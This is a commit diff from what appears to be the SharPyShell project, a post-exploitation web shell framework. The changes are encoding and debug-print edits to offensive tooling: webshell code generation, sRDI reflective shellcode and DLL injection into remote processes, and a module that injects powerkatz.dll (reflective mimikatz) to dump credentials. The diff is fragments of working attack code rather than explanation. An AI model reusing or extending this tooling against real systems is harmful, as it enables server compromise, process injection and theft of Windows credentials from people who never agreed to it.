Projects STRLCPY SharPyShell Commits 71a60a4f
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    50 50   xored.append(hex(x ^ ord(y)))
    51 51   return '{' + ",".join(xored) + '}'
    52 52   
    53  - def generate_byte_file_string(byte_arr):
    54  - output = [str(hex(byte)) for byte in byte_arr]
    55  - return '{' + ",".join(output) + '}'
    56  - 
    57 53   if 'aes' in self.__encryption:
    58 54   dll_name = 'runtime_compiler_aes.dll'
    59 55   else:
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    66 62   
    67 63   def __generate_webshell_code_ulong_compression(self, template_code):
    68 64   def get_dll_code(dll_code_path):
    69  - with open(dll_code_path, 'r') as file_handle:
     65 + with open(dll_code_path, 'rb') as file_handle:
    70 66   dll_code =
    71 67   return dll_code
    72 68   
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    111 111   return output_file_size
    112 112   
    113 113   def __write_local_file(self, file_content, output_path, split=False):
    114  - print(type(file_content))
    115 114   if split:
    116 115   file_open_mode = 'ab'
    117 116   else:
    118 117   file_open_mode = 'wb'
    119  - print(file_open_mode)
    120 118   with open(output_path, file_open_mode) as outfile:
    121 119   outfile.write(bytes(file_content, "utf-8"))
    122 120   output = "File Downloaded correctly to " + output_path
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    38 38   functionHash = 0
    39 39   
    40 40   for b in function:
    41  - b = ord(b)
    42 41   functionHash = ror(functionHash, 13, 32)
    43 42   functionHash += b
    44 43   
    45 44   moduleHash = 0
    46 45   
    47 46   for b in module:
    48  - b = ord(b)
    49 47   moduleHash = ror(moduleHash, 13, 32)
    50 48   moduleHash += b
    51 49   
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    57 55   functionHash = 0
    58 56   
    59 57   for b in function:
    60  - b = ord(b)
    61 58   functionHash = ror(functionHash, 13, 32)
    62 59   functionHash += b
    63 60   
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    145 142   # RDI shellcode
    146 143   # DLL bytes
    147 144   # User data
    148  - return bootstrap + rdiShellcode + dllBytes + userData
     145 + return bootstrap + rdiShellcode + dllBytes + str.encode(userData, 'utf-16-le')
    149 146   
    150 147   else: # 32 bit
    151 148   rdiShellcode = rdiShellcode32
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    217 214   # RDI shellcode
    218 215   # DLL bytes
    219 216   # User data
    220  - return bootstrap + rdiShellcode + dllBytes + userData
     217 + return bootstrap + rdiShellcode + dllBytes + str.encode(userData, 'utf-16-le')
    221 218   
    222 219   
    223 220  class Inject_dll_srdi(Inject_shellcode):
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    126 126   dll_name = 'powerkatz.dll'
    127 127   exported_function_name = 'powershell_reflective_mimikatz'
    128 128   log_file = self._module_settings['env_directory'] + '\\' + random_generator()
    129  - exported_function_data = str(('"log ' + log_file + '" ' + custom_command + '\x00').encode('utf-16-le'))
     129 + exported_function_data = '"log ' + log_file + '" ' + custom_command
    130 130   if username == '':
    131 131   print ('\n\nInjecting converted DLL shellcode into remote process...')
    132 132   response =[dll_name, 'remote_virtual', 'cmd.exe', '60000', '{}',
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    11 11   
    12 12   
    13 13  def get_compressed_base64_from_binary(bin_bytearray_input):
    14  - print(base64.b64encode(gzip.compress(bin_bytearray_input)).decode())
    15 14   return base64.b64encode(gzip.compress(bin_bytearray_input)).decode()
    16 15   
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